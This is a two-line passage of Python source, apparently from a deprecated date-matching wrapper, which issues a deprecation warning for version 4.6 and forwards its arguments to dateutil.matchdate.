    nouideprecwarn(msg, "4.6")
    return dateutil.matchdate(*args, **kwargs)